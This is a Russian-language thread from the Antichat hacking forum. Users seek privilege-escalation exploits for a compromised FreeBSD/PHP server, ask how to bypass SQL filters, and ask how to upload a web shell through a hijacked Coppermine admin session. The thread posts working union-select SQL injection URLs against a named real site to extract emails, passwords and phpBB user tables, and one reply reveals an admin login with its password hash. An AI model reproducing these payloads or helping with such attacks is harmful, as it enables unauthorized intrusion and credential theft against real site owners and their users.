ANTICHAT — форум по информационной безопасности, OSINT и технологиям

мне нужно именно знать какие есть сплойты, какая инфа нужна для того что бы проверить реально ли воспользоватся данным сплойтом, просто хочу что бы все было быстро и оперативно.

Sharingan, знаешь какая ОС?
Можно поискать под конкретную версию + сплоит под сервисы, которые крутятся на машине

FreeBSD 6.2-RELEASE-p5
Server: Apache
safe_mode: OFF PHP version: 4.4.7 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF
если на таком шелл стоит реально ли права поднять?

Сейф мода нет...дас ист гут
Вот, поищи тут:
http://milw0rm.org/search.php
Лучше в поиск вбивать названия демонов

Кто нибудь подскажет как обойти фильтр последовательности union select from?
----------------------------------
читал, но вопрос остался

Hi All
Такой вопрос зашёл в админку Coppermine Photo Gallery через куку админа такой вопрос как лучше залить шел ? заранее спасибо !!!

http://forum.antichat.ru/threadnav59410-1-10-Coppermine%2BPhoto%2BGallery.html

касательно сообщение #1921 так и не нашел сплойта, может кто что посоветует ?

кароче я все подставил как мне человнк подсказал и получилось)) вот что получилось http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,usr_emai l,usr_psw,15,16,usr_id,18+from+users+limit+1,1/*

Собственно я сразу побежал в админку http://r-est.biz/admin вроде как не получилось войти (катогория админки не та вроде как) кароче я решил ломануть ихний phpbb форум. подставил все вроде правильно но чето не высвечиваеться пароли((

http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,username ,user_password,15,16,user_id,18+from+phpbb_users+l imit+1,1/*

вот колонки phpbb

http://r-est.biz/?r=nj&n=24+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14 ,15,16,column_name,18+from+information_schema.colu mns+where+table_name=0x70687062625f7573657273+limi t+1,100/*

Подскажите если не трудно

diznt
не трудно..)

admin;e816c860394f9fb51eed8d902a569e5d